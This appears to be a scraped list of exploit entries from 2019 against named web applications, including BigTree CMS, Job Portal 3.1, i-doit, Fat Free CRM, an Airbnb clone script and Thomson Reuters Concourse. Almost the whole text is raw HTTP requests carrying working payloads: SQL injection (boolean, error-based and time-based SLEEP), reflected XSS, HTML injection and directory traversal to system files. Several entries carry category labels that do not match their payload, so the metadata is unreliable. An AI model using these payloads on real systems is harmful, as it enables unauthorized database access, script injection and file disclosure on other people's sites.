User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 59

arac_kategori_id=-1' OR 3*2*1=6 AND 000224=000224 --

Target program: Jettweb
Target environment: Jettweb PHP Hazır Rent A Car Sitesi Scripti V2

2019-03-28 46623 SQL Injection (attack difficulty: Low, attack risk: Medium)
BigTree 4.3.4 CMS - Multiple SQL Injection

GET /10.0.100.24/BigTree-CMS/site/index.php/admin/ajax/tags/get-page/?page='or 1=1--&sort= HTTP/1.1

Target program: BigTree
Target environment: BigTree 4.3.4 CMS

2019-03-28 46622 SQL Injection (attack difficulty: Low, attack risk: Low)
Job Portal 3.1 - 'job_submit' SQL Injection

POST /10.0.100.24/newjobportal/job_search/search HTTP/1.1
Host: 10.0.100.24
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 59

job_submit=convert(int%2c+cast(0x454d49524f474c55+as+varchar(8000)))

Target program: Job Portal
Target environment: Job Portal 3.1

2019-03-28 46620 SQL Injection (attack difficulty: Medium, attack risk: High)
i-doit 1.12 - 'qr.php' Cross-Site Scripting

/IP_ADDRESS/src/tools/php/qr/qr.php?url=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E

Target program: i-doit
Target environment: i-doit 1.12

2019-03-28 46617 SQL Injection (attack difficulty: Medium, attack risk: Medium)
Fat Free CRM 0.19.0 - HTML Injection

POST /comments HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: */*;q=0.5, text/javascript, application/javascript, application/ecmascript, application/x-ecmascript
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-CSRF-Token: xikVMkG4Le6llfW44C7CQZsD3Qz7bDgbMCbPFCtMjbzJFTfTF5SOx6xPhFDB6EL8MFNSNspHI51gZqz4V7QNMQ==
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 162
DNT: 1
Connection: close

utf8=%E2%9C%93&comment%5Bcommentable_id%5D=143&comment%5Bcommentable_type%5D=Contact&comment%5Bcomment%5D=%22%3E%3Ch1%3EIsmail+Tasdelen%3C%2Fh1%3E&commit=Add+Note

Target program: Fat Free
Target environment: Fat Free CRM 0.19.0

2019-03-28 46616 SQL Injection (attack difficulty: Medium, attack risk: Medium)
Airbnb Clone Script - Multiple SQL Injection

GET /10.0.100.24/admin/edit.php?id=if(now()=sysdate()%2Csleep(0)%2C0) HTTP/1.1
Host: 10.0.100.24:1004
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=a5i6r78j7v22ql1qrvtsampff6
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1

checkin=mm/dd/yy&checkout=mm/dd/yy&hosting_id=1' AND SLEEP(5)--DXVl&number_of_guests=1

catid=-1'%20OR%203*2*1=6%20AND%20000640=000640%20--%20

pt=-1'%20OR%203*2*1=6%20AND%20000929=000929%20--%20

val=-1'%20OR%203*2*1=6%20AND%20000886=000886%20--%20

Target program: Airbnb
Target environment: Airbnb Clone Script

2019-03-28 46615 Directory Traversal (attack difficulty: Low, attack risk: Low)
Thomson Reuters Concourse & Firm Central < 2.13.0097 - Directory Traversal / Local File Inclusion

GET \..\..\..\..\..\..\..\..\..\..\Windows\System32\drivers\etc\hosts HTTP/1.1

Target program: Thomson
Target environment: Thomson Reuters Concourse & Firm Central < 2.13.0097